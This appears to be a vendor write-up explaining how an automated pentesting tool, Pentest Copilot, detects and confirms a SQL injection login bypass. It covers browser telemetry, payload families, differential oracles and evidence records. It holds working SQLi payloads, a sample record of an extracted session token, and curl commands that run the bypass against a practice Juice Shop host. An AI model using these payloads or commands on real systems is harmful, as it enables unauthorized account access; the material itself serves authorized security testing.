A technical deep dive into how Pentest Copilot autonomously proves a SQL injection authentication bypass: browser instrumentation → action capture → guided payloads → differential oracles → secret extraction and safe session pivoting, all persisted as evidence in an Exploit Graph for replay and continuous retest.
Pentest Copilot runs an instrumented headless Chrome session that behaves like a real user but with full telemetry. Every click or keypress generates a canonical Action with its raw HTTP request and response (method, URL, headers, cookies, body, timings, response bytes). These artifacts are turned into typed entities in the Exploit Graph: URL, Action, BrowserSession, TestCaseRef, Vulnerability, and Secret. Edges encode provenance: ACTION → REQUEST, REQUEST → RESPONSE, TEST_CASE → REQUEST, RESPONSE → SECRET, SECRET → PRIV_ACTION. This graph-first design makes the causal chain visible and ensures replays are exact.
POST /rest/user/login).1{
2 "method": "POST",
3 "url": "https://<host>/rest/user/login",
4 "headers": { "...": "..." },
5 "body": {"email":"<e>", "password":"<p>"},
6 "context": {"cookies":[...], "session_id":"..."}
7}Parameter and sink identification
The generator identifies database-relevant sinks (credentials into auth queries) using heuristics: route templates (/login), response features (401 vs 200), and content differences (presence of tokens). It also fingerprints the backend to pick safe payload sets.
Payload synthesis (SQLi families)
The generator compiles a set of SQLi payloads aimed at auth sinks:
1Boolean: ' OR 1=1 --
2Quoted Boolean: " OR "1"="1" --
3Comment: --, #, /*…*/
4Time-based: '||pg_sleep(2)-- , ' AND SLEEP(2)--
5Structural: OR 1=1)/* (balanced parens)Each candidate is placed only where it makes sense (like the password field) while maintaining valid JSON.
Set-Cookie or Authorization headerOnly when two or more oracles agree does a candidate move from suspicion to confirmed evidence.
/profile). On success, the token is stored as a Secret tied to the request and response. The tester may then pivot (like requesting a user page) to demonstrate impact, within configured limits.Your screenshots show this lifecycle: a Vulnerability node mapped to CWE-89, vulnerable requests with status 200, justification text, and a redacted JWT string stored as a Secret.
A Copilot evidence record might look like:
1{
2 "modified_request": {
3 "url": "https://<host>/rest/user/login",
4 "method": "POST",
5 "headers": {...},
6 "body": {"email":"[email protected]","password":"' OR 1=1 -- "}
7 },
8 "response": {
9 "status_code": 200,
10 "response_headers": {"content-type":"application/json"},
11 "body_sample": {"authentication":"<redacted>", "role":"user"},
12 "response_size": 2132,
13 "response_time_ms": 712
14 },
15 "request_vulnerability_justification": "Differential analysis between baseline 401 and modified 200 with token indicates SQLi in authentication.",
16 "final_verdict": {
17 "verdict": "confirmed",
18 "final_severity": "critical",
19 "justification": "Unauthenticated user obtained valid session token via SQL injection bypass."
20 },
21 "secret_exists": true,
22 "secret_type": "jwt",
23 "next_step": {"action_type":"USE_SESSION", "context":"validate access to authenticated endpoints"}
24}Run these only in a lab or with explicit authorization:
1# Baseline: expect 401
2curl -sS -i https://juice.bugbase.ai/rest/user/login \
3 -H 'Content-Type: application/json' \
4 --data '{"email":"[email protected]","password":"wrong"}'
5
6# Modified: boolean SQLi
7curl -sS -i https://juice.bugbase.ai/rest/user/login \
8 -H 'Content-Type: application/json' \
9 --data '{"email":"[email protected]","password":"\' OR 1=1 -- "}'If the second call returns 200 and a token-like body, Copilot’s oracles fire and it records the Secret.